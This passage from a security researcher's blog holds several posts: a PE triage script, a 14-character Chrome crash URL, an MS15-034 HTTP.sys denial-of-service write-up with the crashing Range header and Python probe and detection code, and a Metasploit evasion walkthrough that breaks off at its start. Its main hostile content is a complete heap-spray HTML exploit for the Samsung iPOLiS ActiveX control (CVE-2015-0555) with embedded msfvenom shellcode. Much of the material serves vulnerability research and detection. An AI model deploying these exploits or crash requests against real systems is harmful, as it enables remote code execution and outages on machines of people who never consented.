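        findings.append("linker timestamp zeroed (deliberately stripped)")
    elif in_us_working_hours(ts):
        when = datetime.fromtimestamp(ts, tz=EASTERN).strftime("%Y-%m-%d %H:%M")
        findings.append(f"linker timestamp {when} Eastern falls in US working hours")
    hits = sorted(INJECTION_APIS.intersection(imports))
    if hits:
        findings.append("injection-related imports: " + ", ".join(hits))
    for text in list(exports) + list(strings):
        lowered = text.lower()
        words = [w for w in DIRTY_WORDS if w in lowered]
        if words:
            findings.append(f"dirty word(s) {words} in {text!r}")
        m = USER_PATH.search(text)
        if m:
            findings.append(f"developer username {m.group(1)!r} in build path {text!r}")
    return findings


# Constructed sample: "compiled" Fri 2015-04-17 15:00 UTC (10:00 Eastern), with
# injection imports, a telling export name and a PDB path from a user profile.
SAMPLE_TS = 1429282800
SAMPLE_PE = build_pe_stub(SAMPLE_TS)
SAMPLE_IMPORTS = ["CreateFileW", "WriteProcessMemory", "CreateRemoteThread"]
SAMPLE_EXPORTS = ["DllMain", "InjectPayload"]
SAMPLE_STRINGS = [r"C:\Users\dev-user\src\tool\Release\tool.pdb", "notepad replacement"]

if __name__ == "__main__":
    for finding in triage(SAMPLE_PE, SAMPLE_IMPORTS, SAMPLE_EXPORTS, SAMPLE_STRINGS):
        print("-", finding)
```

In practice the import, export and string lists come from a PE parser such as pefile or from the <span style="font-family: Courier New, Courier, monospace;">strings</span> tool; the point of the checks is that each one is the mirror image of a row in the table, so a tool that followed the table leaves nothing for them to find, and one that did not is flagged on several rows at once.<br />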
CIA - Central Intelligence Agency<br />
USG - United States GovernmentPraveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com1tag:blogger.com,1999:blog-1852980805947568568.post-38887659298226660822015-09-23T12:31:00.000+05:302015-09-23T12:31:24.359+05:30ChromeCrash: It is not 16 characters but 14!Sixteen characters are said to be enough to crash the latest Chrome browser, and there are many articles about this DoS vulnerability. Most of them state that the minimum number of characters needed to trigger the crash is 16, but my tests show that 14 characters are enough.<br />
Those articles point to the URL below (16 characters):<br />
<span style="color: #cc0000;">http://a/%%30%30</span><br />
<br />
Tested with the following URL (14 characters), which also triggers the crash:<br />
<span style="color: #cc0000;">ws://a/%%30%30</span><br />
The ws URI scheme stands for WebSockets.<br />
<br />
One of the first bugs in Chrome needed only a single character (%) to crash the browser; it was found by a friend of mine, Rishi Narang.<br />
<br />
Tested on<br />
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td><b>Google Chrome</b></td><td><span style="font-family: Courier New, Courier, monospace;">45.0.2454.99 (Official Build) m (32-bit)</span></td></tr>
<tr><td><b>Revision</b></td><td><span style="font-family: Courier New, Courier, monospace;">8813113675a50e4f7e90fec49a3eb1796454618b-refs/branch-heads/2454@{#492}</span></td></tr>
<tr><td><b>OS</b></td><td><span style="font-family: Courier New, Courier, monospace;">Windows</span></td></tr>
</tbody></table>
The list of IANA-registered URI schemes can be found at<br />
<a href="http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml">http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-13056343651083266842015-04-17T23:28:00.001+05:302015-04-17T23:45:30.741+05:30HTTP.sys Denial of Service (MS15-034/CVE-2015-1635)The vulnerability is triggered by a crafted HTTP request carrying a very large value in the Range header. HTTP.sys (the kernel-mode driver behind IIS) fails to validate the value properly, leading to denial of service (an unresponsive server or a Blue Screen of Death) and possibly code execution.<br />
<br />
To trigger the vulnerability, request a resource that actually exists on the IIS web server, e.g. one of the default files (welcome.png, iisstart.htm, etc.).<br />
<br />
Original PoC was posted on Pastebin<br />
<a href="http://pastebin.com/raw.php?i=ypURDPc4">http://pastebin.com/raw.php?i=ypURDPc4</a><br />
<br />
You can check whether kernel-mode caching is enabled (it is enabled by default).<br />
If IIS Manager is installed, follow the steps below:<br />
IIS Manager -> Default Web Site -> Output Caching -> double click -> Edit Feature Settings (on the top right)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcrXzi2PRhrW2Ti9ZWNVMZJtUjIBjxskMu3w-N-2XjDD_w1STmuwNiGJitN66Ue5vXVQ20A3_dZoC6AxI9ugW4NZ80_oElpVHACXSOtVut1da7mmzd07lIwlQ5op0XYNJfaJvHDfVwUBj/s1600/HTTP_sys_OutputCaching.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcrXzi2PRhrW2Ti9ZWNVMZJtUjIBjxskMu3w-N-2XjDD_w1STmuwNiGJitN66Ue5vXVQ20A3_dZoC6AxI9ugW4NZ80_oElpVHACXSOtVut1da7mmzd07lIwlQ5op0XYNJfaJvHDfVwUBj/s1600/HTTP_sys_OutputCaching.png" height="236" width="400" /></a></div>
<br />
To add a cache rule, click the Add link on the top right (not required, though).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhY_1FmGtbzVEIarvWV69fB5dAjtkXN2Plt_EG9pL6u3MK09Uuk8ET70mxR0mTXthoOCnQLMY6DDqEdvq2oHuOM17m-jow6j8phVTRIQ-vbXQX26b8Qv9qS8bCQy7CWpCWAYVCAIY87ERT/s1600/HTTP_sys_Addhtmextension_KernelCaching.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhY_1FmGtbzVEIarvWV69fB5dAjtkXN2Plt_EG9pL6u3MK09Uuk8ET70mxR0mTXthoOCnQLMY6DDqEdvq2oHuOM17m-jow6j8phVTRIQ-vbXQX26b8Qv9qS8bCQy7CWpCWAYVCAIY87ERT/s1600/HTTP_sys_Addhtmextension_KernelCaching.png" height="236" width="400" /></a></div>
<br />
<br />
We can also verify the HTTP parameters from the command line (CLI).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK1wj7yXhtV2U6zyxSkG1K5Gp9h90Xbg7uV9v9-Ztz7_oFyi_jMMOJg6lS6RnW3rCjPZn-ioGsLLgUf734BQkX_aeXpUnxw0sgiExvDV3lg-qmlKSV1l_8gVMFqTs7OsyKdtvMRw_w8bb7/s1600/HTTP_sys_cli_check_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK1wj7yXhtV2U6zyxSkG1K5Gp9h90Xbg7uV9v9-Ztz7_oFyi_jMMOJg6lS6RnW3rCjPZn-ioGsLLgUf734BQkX_aeXpUnxw0sgiExvDV3lg-qmlKSV1l_8gVMFqTs7OsyKdtvMRw_w8bb7/s1600/HTTP_sys_cli_check_config.png" height="341" width="400" /></a></div>
<br />
<br />
I successfully tested this and observed a BSoD on a default installation of Windows 7 SP1 with IIS 7.5.<br />
The following Range header did not lead to a crash in my case:<br />
<span style="font-family: Courier New, Courier, monospace;">Range: bytes=0-18446744073709551615</span><br />
but<br />
<span style="font-family: Courier New, Courier, monospace;">Range: bytes=18-18446744073709551615</span><br />
reliably leads to a DoS. A single HTTP request did not cause the DoS in my tests; at least two or three requests were needed.<br />
<br />
<b>Auditing/assessing IIS using the script available on Pastebin</b><br />
Request<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET / HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=0-18446744073709551615</span><br />
<br />
Response<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>HTTP/1.1 416 Requested Range Not Satisfiable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Type: text/html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETag: "a0495b17f4dd01:0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Server: Microsoft-IIS/7.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-Powered-By: ASP.NET</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-UA-Compatible: IE=EmulateIE7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Date: Fri, 17 Apr 2015 06:51:08 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Length: 362</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Range: bytes */689</span><br />
<b><span style="color: red;">[!!] Looks VULN</span></b><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span><br />
<br />
The error message "HTTP Error 416. The requested range is not satisfiable" indicates that the IIS web server is vulnerable: unpatched HTTP.sys accepts the oversized range and answers 416, whereas a server with the MS15-034 update rejects the request with 400 Bad Request instead.<br />
<br />
Even if we request a valid resource (welcome.png) with the range 0-18446744073709551615 we get the 416 response shown above, but no BSoD or unresponsiveness.<br />
<div>
<span style="font-family: Courier New, Courier, monospace;">GET /welcome.png HTTP/1.1</span></div>
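To automate the 416 check above without ever sending the crashing range, here is an added Python example (it is not the Pastebin script the post refers to). It builds the non-crashing probe request, classifies the response (416 from IIS means likely vulnerable, 400 means likely patched, anything else is inconclusive), and also runs the inverse check a defender wants on captured traffic: flagging requests whose Range header carries a last-byte-pos no real client would send. The host names, the sample requests and the 2**63 threshold are constructed assumptions.<br />

```python
"""MS15-034 probe builder, response classifier and Range-header detector.

Added example, not the Pastebin PoC the post refers to. It uses the
non-crashing probe from the post (Range: bytes=0-18446744073709551615,
answered with 416 by unpatched HTTP.sys) and never sends the crashing
variant. Host names, the sample requests and the 2**63 threshold are
constructed assumptions for this example.
"""
import re
import socket

MAX_UINT64 = 2**64 - 1                # 18446744073709551615, the value in the PoC
SAFE_RANGE = f"bytes=0-{MAX_UINT64}"  # returns 416 on vulnerable hosts, no crash


def build_probe(host: str, path: str = "/") -> bytes:
    """Raw HTTP/1.1 request carrying the non-crashing MS15-034 probe range."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {SAFE_RANGE}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode()


def classify_response(raw: bytes) -> str:
    """Map the status line of the probe response to a verdict.

    Unpatched HTTP.sys answers the probe with 416; with the MS15-034 update
    applied it rejects the request with 400 Bad Request. Anything else (for
    example 200/206 from a non-IIS server) is inconclusive.
    """
    m = re.match(rb"HTTP/1\.[01] (\d{3})", raw)
    if not m:
        return "no HTTP response"
    status = int(m.group(1))
    server = re.search(rb"(?im)^Server:\s*(.+?)\r?$", raw)
    iis = server is not None and b"Microsoft-IIS" in server.group(1)
    if status == 416:
        return "likely vulnerable" if iis else "inconclusive (416 from non-IIS server)"
    if status == 400:
        return "likely patched"
    return f"inconclusive (HTTP {status})"


def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> str:
    """Send the probe over a plain socket and classify the answer (needs a live host)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host, path))
        data = b""
        while len(data) < 4096:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return classify_response(data)


RANGE_RE = re.compile(r"bytes=(\d+)-(\d*)")


def suspicious_range(header_value: str) -> bool:
    """Flag Range headers whose last-byte-pos cannot be a real file offset.

    Assumption: no legitimate client asks for a last-byte-pos >= 2**63; the
    published MS15-034 PoCs all use 2**64-1.
    """
    for _first, last in RANGE_RE.findall(header_value):
        if last and int(last) >= 2**63:
            return True
    return False


def flag_requests(requests):
    """Indices of raw requests whose Range header looks like an MS15-034 attempt."""
    flagged = []
    for i, req in enumerate(requests):
        m = re.search(r"(?im)^Range:\s*(.+?)\r?$", req)
        if m and suspicious_range(m.group(1)):
            flagged.append(i)
    return flagged


# Constructed sample traffic: the crashing request from the post, a normal
# partial-content request for a video, and a request with no Range at all.
SAMPLE_REQUESTS = [
    "GET /welcome.png HTTP/1.1\r\nHost: 192.168.56.110\r\nRange: bytes=18-18446744073709551615\r\n\r\n",
    "GET /video.mp4 HTTP/1.1\r\nHost: 192.168.56.110\r\nRange: bytes=1048576-2097151\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.56.110\r\n\r\n",
]

if __name__ == "__main__":
    print("flagged requests:", flag_requests(SAMPLE_REQUESTS))
    print(classify_response(b"HTTP/1.1 416 Requested Range Not Satisfiable\r\nServer: Microsoft-IIS/7.5\r\n\r\n"))
```

<span style="font-family: Courier New, Courier, monospace;">probe("192.168.56.110")</span> performs the live check; <span style="font-family: Courier New, Courier, monospace;">flag_requests</span> is the same logic turned around for IDS or proxy logs, where the oversized last-byte-pos is the signature to hunt for regardless of which path was requested.<br />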
<br />
<b>Blue Screen of Death</b><br />
A connection reset, a junk response, or no response at all from the IIS server (Wireshark then shows the request being retransmitted) indicates unresponsiveness or a BSoD. Let's look at Wireshark traces showing these scenarios.<br />
<span style="color: #351c75;">Connection Reset from IIS Server</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaV6OFgZPlLzDc2ZyYcNeT3DNBJI4eiqUcADHFKisHxZi_CD6qTgYfvgLl8yjuc_K__miICaLSOaQrXPcsgzYlscv31__DtB71TLxzYRZZkuTDPlykYrmJbcQjN_KejP9FvqpwQqVl73M/s1600/HTTP_sys_RST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaV6OFgZPlLzDc2ZyYcNeT3DNBJI4eiqUcADHFKisHxZi_CD6qTgYfvgLl8yjuc_K__miICaLSOaQrXPcsgzYlscv31__DtB71TLxzYRZZkuTDPlykYrmJbcQjN_KejP9FvqpwQqVl73M/s1600/HTTP_sys_RST.png" height="163" width="400" /></a></div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET /welcome.png HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=18-18446744073709551615</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Traceback (most recent call last):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  File "./ms15_034.py", line 27, in &lt;module&gt;</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> goodResp = client_socket.recv(1024)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">socket.error: [Errno 104] Connection reset by peer</span><br />
<br />
<span style="color: #351c75;">Junk Response (partial content)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS_vGYH74YFfulME__AjHi-7_dOHFgkVl4D83et3Y0CfQtQQNOFqJE3P2oLp0U0YZy54u8431MYhAwcqEyMumPmmBdUvykjFnbHiCfEouAvlTAkDq1hb9XNUp00E0nkIPFH_M2dOMzPUs6/s1600/HTTP_sys_BSoD_pcap_with_Resp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS_vGYH74YFfulME__AjHi-7_dOHFgkVl4D83et3Y0CfQtQQNOFqJE3P2oLp0U0YZy54u8431MYhAwcqEyMumPmmBdUvykjFnbHiCfEouAvlTAkDq1hb9XNUp00E0nkIPFH_M2dOMzPUs6/s1600/HTTP_sys_BSoD_pcap_with_Resp.png" height="235" width="400" /></a></div>
<br />
This type of response will definitely lead to BSoD.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP/1.1 206 Partial Content</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Type: image/png</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETag: "30df5f17f4dd01:0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Server: Microsoft-IIS/7.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-Powered-By: ASP.NET</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-UA-Compatible: IE=EmulateIE7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ?$? ?3s? ? ???$?h$z? B?Content-Range: bytes 18-429</span><br />
<br />
<span style="color: #351c75;">No response from IIS Server (duplicate requests)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNhm6vtemMQYKyZrxn228oYO06oRe3J4QCMlZp9A4_2OLmqR-HFs5yxdgLL1YsVD9gWOas4pw7M5R0FS63M10vdjDc5UuPqWNXuRft1PyjEYjFYPvl-h7dI1L8uFhi1fdXPBr3uBc_SLel/s1600/HTTP_sys_BSoD_pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNhm6vtemMQYKyZrxn228oYO06oRe3J4QCMlZp9A4_2OLmqR-HFs5yxdgLL1YsVD9gWOas4pw7M5R0FS63M10vdjDc5UuPqWNXuRft1PyjEYjFYPvl-h7dI1L8uFhi1fdXPBr3uBc_SLel/s1600/HTTP_sys_BSoD_pcap.png" height="171" width="400" /></a></div>
This scenario mostly leads to unresponsiveness; the PoC script may get stuck in the request phase.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET /welcome.png HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=18-18446744073709551615</span><br />
<br />
A successful attack leads to a BSoD; the following are the stop codes I observed:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IRQL_NOT_LESS_OR_EQUAL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PAGE_FAULT_IN_NONPAGED_AREA</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWi0hgVDzSnFjQPiQQopnHJn6JFQP58LvLAxqjD9lMaf6sE7VCAOfGM653mAsPA0ZMmgmDa8le7WLj6VS9w_bJpseI_S4Vmg6kYNYr1PbglHpyUNhcUvmJN-mWJge1XLn5izRvN6s81NE/s1600/HTTP_sys_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWi0hgVDzSnFjQPiQQopnHJn6JFQP58LvLAxqjD9lMaf6sE7VCAOfGM653mAsPA0ZMmgmDa8le7WLj6VS9w_bJpseI_S4Vmg6kYNYr1PbglHpyUNhcUvmJN-mWJge1XLn5izRvN6s81NE/s1600/HTTP_sys_BSoD.png" height="231" width="400" /></a></div>
<br />
We will see the following error message once the server comes back up after recovering from the BSoD.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmNXoFGgCAhvwgzpEfUEAIlxo5bXY37qLiaKkeCnZfiL4woE6a7rpDA35kTewr79rWVOfVOyy2YvYoDWGmoUy6o_0GGqLyXDZy96hz-UiM7IjjXRsQH0nyAsExkVQ1TwCibA9N8AzZv44/s1600/HTTP_sys_afterRecovering_from_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmNXoFGgCAhvwgzpEfUEAIlxo5bXY37qLiaKkeCnZfiL4woE6a7rpDA35kTewr79rWVOfVOyy2YvYoDWGmoUy6o_0GGqLyXDZy96hz-UiM7IjjXRsQH0nyAsExkVQ1TwCibA9N8AzZv44/s1600/HTTP_sys_afterRecovering_from_BSoD.png" height="245" width="400" /></a></div>
<br />
No authentication is required to trigger the BSoD. Patch immediately!<br />
<br />
For more details<br />
<a href="https://github.com/rapid7/metasploit-framework/pull/5150">https://github.com/rapid7/metasploit-framework/pull/5150</a><br />
<a href="https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/">https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-51002031348486342312015-04-17T21:20:00.001+05:302015-04-17T21:26:51.554+05:30Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (Heap Spray)<br />
Both commands below generate the same payload, but msfpayload is deprecated and will be removed from future Metasploit releases.<br />
<span style="color: #cc0000;">root@kali-ucs:~# msfpayload windows/exec cmd=calc J</span><br />
<span style="color: #cc0000;">root@kali-ucs:~# msfvenom -p windows/exec cmd=calc -f js_le</span><br />
<i>%ue8fc%u0082<b>%u0000</b>%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285<b>%u0000</b>%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100</i><br />
root@kali-ucs:~#<br />
<br />
Selecting the js_be format in <span style="font-family: Courier New, Courier, monospace;">msfvenom</span> throws the error "Big endian format selected for a non big endian payload".<br />
<br />
JavaScript shellcode can contain null bytes (shown in bold above): the %uXXXX escapes are decoded by unescape() into a JavaScript string, so an embedded null does not terminate it the way it would a C string.<br />
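How the %uXXXX words map onto bytes, and how large the spray below actually is, as an added Python example (it is not msfvenom's code and not part of the original post): it reimplements the js_le packing so the null-byte point can be checked on the real payload prefix, shows why js_be is refused for an x86 payload, and computes the spray geometry the exploit uses (0x40000-character blocks, 500 copies, target 0x06060606). The NOP pad byte for odd-length input and the assumed heap base are this example's own choices.<br />

```python
"""%uXXXX (msfvenom js_le) encoding and the spray arithmetic behind the exploit.

Added example, not msfvenom's code and not part of the original post. The
padding byte for odd-length input and the heap base used in the coverage
check are this example's assumptions.
"""
import re


def to_js_le(raw: bytes, pad: int = 0x90) -> str:
    """Encode bytes as %uXXXX words, little-endian (byte 0 becomes the low byte).

    Assumption: an odd trailing byte is completed with `pad` (a NOP) so the
    last word is whole; msfvenom chooses its own pad byte.
    """
    if len(raw) % 2:
        raw += bytes([pad])
    return "".join(f"%u{raw[i + 1]:02x}{raw[i]:02x}" for i in range(0, len(raw), 2))


def to_js_be(raw: bytes, pad: int = 0x90) -> str:
    """Big-endian variant: the byte order inside each word is swapped, which is
    why msfvenom refuses js_be for an x86 (little-endian) payload."""
    if len(raw) % 2:
        raw += bytes([pad])
    return "".join(f"%u{raw[i]:02x}{raw[i + 1]:02x}" for i in range(0, len(raw), 2))


def from_js(encoded: str) -> bytes:
    """Decode %uXXXX words to bytes exactly as unescape() lays them out in memory
    (UTF-16LE code units), so nulls survive, unlike in a C string."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", encoded)
    return b"".join(int(w, 16).to_bytes(2, "little") for w in words)


def spray_geometry(shellcode_chars, block_chars=0x40000, copies=500, header_chars=20):
    """Sizes of one sprayed chunk and of the whole spray, in bytes.

    Each JavaScript character is a 16-bit code unit, so a %uXXXX word costs
    two bytes. The exploit grows the NOP block until block + header + shellcode
    reaches block_chars, then appends the shellcode to each of `copies` blocks,
    so each chunk is (block_chars - header_chars) characters long.
    """
    chunk_bytes = 2 * (block_chars - header_chars)
    nop_bytes = 2 * (block_chars - header_chars - shellcode_chars)
    return {
        "chunk_bytes": chunk_bytes,
        "nop_bytes": nop_bytes,
        "total_bytes": chunk_bytes * copies,
        "nop_fraction": nop_bytes / chunk_bytes,   # chance a landing hits the sled
    }


def address_covered(addr, total_bytes, heap_base=0x00150000):
    """True if `addr` lies inside the sprayed region.

    Assumption: large string allocations start near `heap_base` and grow upward
    contiguously; real heaps are not that tidy, which is why the spray is sized
    with a large margin above 0x06060606.
    """
    return heap_base <= addr < heap_base + total_bytes


# The first 28 bytes of the windows/exec payload shown above (fc e8 82 00 ...).
SAMPLE_SHELLCODE = bytes.fromhex("fce8820000006089e531c0648b50308b520c8b52148b72280fb74a26")

if __name__ == "__main__":
    print(to_js_le(SAMPLE_SHELLCODE))
    geo = spray_geometry(len(SAMPLE_SHELLCODE) // 2)
    print(f"chunk {geo['chunk_bytes']:#x} bytes, spray {geo['total_bytes']:#x} bytes, "
          f"NOP fraction {geo['nop_fraction']:.4f}, covers 0x06060606: "
          f"{address_covered(0x06060606, geo['total_bytes'])}")
```

The roundtrip through <span style="font-family: Courier New, Courier, monospace;">from_js</span> is the check that matters for the null-byte remark: %u0000 comes back as two zero bytes in the middle of the buffer, which is why the payload above needs no null-free encoder.<br />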
<br />
<pre class="prettyprint">
<html>
<!--
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)
CVE: 2015-0555
Author: Praveen Darshanam
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html
http://darshanams.blogspot.com/
Tested on Windows XP SP3 IE6/7
Thanks to Peter Van Eeckhoutte for his wonderful exploit writing tutorials
-->
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>

var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }

// SEH and nSEH will point to 0x06060606
// 0x06060606 will point to (nops+shellcode) chunk
var hbuff = "";
for (i = 0; i <5000; i++)
{
    hbuff += "\x06";
}

// trigger crash
target.ReadConfigValue(hbuff);
</script>
</html>
</pre>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-59198987510451016302015-04-17T20:47:00.002+05:302015-04-17T20:47:42.953+05:30HTTP Evasions using Metasploit FrameworkHTTP evasions using the Metasploit module java_jre17_reflection_types. Below are the details of the HTTP exploit which we will be using for our tests.<br />
<span style="color: #cc0000;">msf > info exploit/multi/browser/java_jre17_reflection_types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Name: Java Applet Reflection Type Confusion Remote Code Execution</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Module: exploit/multi/browser/java_jre17_reflection_types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Platform: Java, Linux, OSX, Windows</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> CVE: 2013-2423 (http://cvedetails.com/cve/2013-2423/)</span><br />
<br />
Execute the commands below to load the exploit module:<br />
<span style="color: #cc0000;">msf > use exploit/multi/browser/java_jre17_reflection_types </span><br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) ></span><br />
<br />
Execute the <span style="font-family: Courier New, Courier, monospace;">show options</span> command to see which parameters need to be set before launching the attack.<br />
We need to set different options such as destination IP/port, local IP/port and payload.<br />
<br />
The following are the evasion options supported by Metasploit for this module.<br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) > show evasion </span><br />
